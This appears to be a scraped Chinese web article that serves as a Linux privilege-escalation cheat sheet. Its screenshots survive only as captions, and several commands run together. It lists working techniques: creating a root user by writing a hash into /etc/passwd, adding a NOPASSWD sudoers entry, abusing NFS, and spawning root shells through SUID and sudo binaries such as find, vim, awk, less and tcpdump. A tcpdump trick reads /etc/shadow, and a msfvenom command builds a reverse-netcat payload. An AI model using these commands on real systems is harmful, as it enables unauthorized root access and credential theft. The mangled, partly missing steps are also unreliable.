编辑-etc-passwd文件进行权限升级

cat /etc/passwd

linux高级权限管理(那些风骚的Linux权限提升技巧)(1)

可以看到可用用户

linux高级权限管理(那些风骚的Linux权限提升技巧)(2)

==这里是正文==

前提:用户具有读/写/etc/passwd权限这里我用root尝试

linux高级权限管理(那些风骚的Linux权限提升技巧)(3)

linux高级权限管理(那些风骚的Linux权限提升技巧)(4)

linux高级权限管理(那些风骚的Linux权限提升技巧)(5)

由于我们在不使用adduser命令的情况下手动创建了一个新用户syst1m,因此在/etc/shadow文件中找不到任何有关信息。但是它在/etc/passwd文件中,此处*符号已被加密密码值替换。通过这种方式,我们可以创建自己的用户以进行权限提升。

1.Opensslopenssl passwd -1 -salt user3 pass1232.mkpasswdmkpasswd -m SHA-512 pass3.Pythonpython -c 'import crypt; print crypt.crypt("pass", "$6$salt")4.Perlperl -le 'print crypt("pass123", "abc")'5.PHPphp -r "print(crypt('aarti','123') . \"\n\");"修改*号处的密码即可

配置错误的NFS的Linux权限升级

核心文件(/etc/exports,/etc/hosts.allow和/etc/hosts.deny.要配置弱的NFS服务器,只查看/etc/export文件)

linux高级权限管理(那些风骚的Linux权限提升技巧)(6)

etc/export文件

linux高级权限管理(那些风骚的Linux权限提升技巧)(7)

linux高级权限管理(那些风骚的Linux权限提升技巧)(8)

1.NMAP

nmap -sV --script=nfs-showmount 192.168.1.1

linux高级权限管理(那些风骚的Linux权限提升技巧)(9)

2.showmount

linux高级权限管理(那些风骚的Linux权限提升技巧)(10)

1.bash文件

linux高级权限管理(那些风骚的Linux权限提升技巧)(11)

2.C程序(来源互联网)

linux高级权限管理(那些风骚的Linux权限提升技巧)(12)

3.Nano/Vi(来源互联网)

linux高级权限管理(那些风骚的Linux权限提升技巧)(13)

4.Sudoers文件nano -p /etc/sudoersignite ALL=(ALL:ALL) NOPASSWD: ALL

通过自动脚本快速识别Windows系统上潜在的权限提升选项

git clone https://github.com/rebootuser/LinEnum.git

linux高级权限管理(那些风骚的Linux权限提升技巧)(14)

linux高级权限管理(那些风骚的Linux权限提升技巧)(15)

linux高级权限管理(那些风骚的Linux权限提升技巧)(16)

linux高级权限管理(那些风骚的Linux权限提升技巧)(17)

wget http://www.securitysift.com/download/linuxprivchecker.py

linux高级权限管理(那些风骚的Linux权限提升技巧)(18)

linux高级权限管理(那些风骚的Linux权限提升技巧)(19)

linux高级权限管理(那些风骚的Linux权限提升技巧)(20)

git clone https://github.com/AlessandroZ/BeRoot.git

用于检查常见的错误配置,以找到提升权限的方法检查文件权限SUID binNFS root压缩DockerSudo规则内核利用

./beroot.py

linux高级权限管理(那些风骚的Linux权限提升技巧)(21)

Cron计划任务Linux权限技巧

linux高级权限管理(那些风骚的Linux权限提升技巧)(22)

linux高级权限管理(那些风骚的Linux权限提升技巧)(23)

linux高级权限管理(那些风骚的Linux权限提升技巧)(24)

linux高级权限管理(那些风骚的Linux权限提升技巧)(25)

https://xz.aliyun.com/t/2401

使用SUID二进制文件进行Linux提权

使用 "cp"进行提权

linux高级权限管理(那些风骚的Linux权限提升技巧)(26)

1.寻找具有SUID的文件

linux高级权限管理(那些风骚的Linux权限提升技巧)(27)

  1. 复制passwd

linux高级权限管理(那些风骚的Linux权限提升技巧)(28)

3.下载修改并让目标下载替换

linux高级权限管理(那些风骚的Linux权限提升技巧)(29)

生成反向连接(利用计划任务bash)msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.108 lport=1234 R

使用Find命令进行提权

linux高级权限管理(那些风骚的Linux权限提升技巧)(30)

linux高级权限管理(那些风骚的Linux权限提升技巧)(31)

使用vim进行提权

linux高级权限管理(那些风骚的Linux权限提升技巧)(32)

==sudoers文件==

linux高级权限管理(那些风骚的Linux权限提升技巧)(33)

Other

nano修改passwd

运行suid脚本

老版本的nmap(2.02-5.21) nmap --interactive lsh whoami msf exploit/unix/local/setuid_nmap

bash nash -p id

less less /etc/passwd !/bin/sh

more more /home/pelle/myfile !/bin/bash

AWk `awk 'BEGIN {system("/bin/bash")}`

man man passwd !/bin/bash

man tcpdump echo $'id\ncat /etc/shadow' > /tmp/.test chmod x /tmp/.test sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root

使用sudo进行Linux提权

/etc/sudoers文件(sudo权限的配置文件)

sudo -l

visudoraaz ALL=(ALL:ALL) ALL/raaz ALL=(ALL)ALLsudo suid

visudoraaz ALL=ALL/raaz ALL=(root) ALLsudo su / sudo bash

技巧

raaz ALL=(root) NOPASSWD: /usr/bin/findsudo find /home -exec /bin/bash \;id

raaz ALL= (root) NOPASSWD: /usr/bin/perl, /usr/bin/python, /usr/bin/less, /usr/bin/awk, /usr/bin/man, /usr/bin/vi

perlsudo perl -e 'exec "/bin/bash";'pythonsudo python -c 'import pty;pty.spawn("/bin/bash")lesssudo less /etc/hosts编辑器中输入!bash,按enter生成awksudo awk 'BEGIN {system("/bin/bash")}'mansudo man man编辑器中输入!bash,按enter生成visudo vi编辑器中输入!bash,按enter生成

sudo /bin/script/asroot.pyid

raaz ALL=(ALL) NOPASSWD: /usr/bin/env, /usr/bin/ftp, /usr/bin/scp, /usr/bin/socat

环境生成shell

sudo env /bin/bashftpsudo ftp! /bin/bashwhoami

通过SCP生成shellscp SourceFile user@host:~/目录路径

## 使用LD_Preload提权

linux高级权限管理(那些风骚的Linux权限提升技巧)(34)

linux高级权限管理(那些风骚的Linux权限提升技巧)(35)

## 使用通配符提权

* 星号匹配文件名中的任意数量的字符,包括无? 问号匹配任何单个字符[] 括号内包含一组字符,其中任何一个字符都可以匹配该位置的单个字符- []中使用的连字符表示字符范围〜 字符开头的~扩展为主目录的名称。将另一个用户的登录名附加到该字符中,它指的是该用户的主目录

在野通配符

linux高级权限管理(那些风骚的Linux权限提升技巧)(36)

文件劫持示例

1.文件所有者通过Chown劫持

linux高级权限管理(那些风骚的Linux权限提升技巧)(37)

linux高级权限管理(那些风骚的Linux权限提升技巧)(38)

## 使用PATH变量进行提权

查看相关用户路径echo $PATH

PATH变量提权方法一

linux高级权限管理(那些风骚的Linux权限提升技巧)(39)

linux高级权限管理(那些风骚的Linux权限提升技巧)(40)

查看程序

linux高级权限管理(那些风骚的Linux权限提升技巧)(41)

1.echo生成root权限

linux高级权限管理(那些风骚的Linux权限提升技巧)(42)

linux高级权限管理(那些风骚的Linux权限提升技巧)(43)

复制命令

linux高级权限管理(那些风骚的Linux权限提升技巧)(44)

symlink命令

linux高级权限管理(那些风骚的Linux权限提升技巧)(45)

linux高级权限管理(那些风骚的Linux权限提升技巧)(46)

,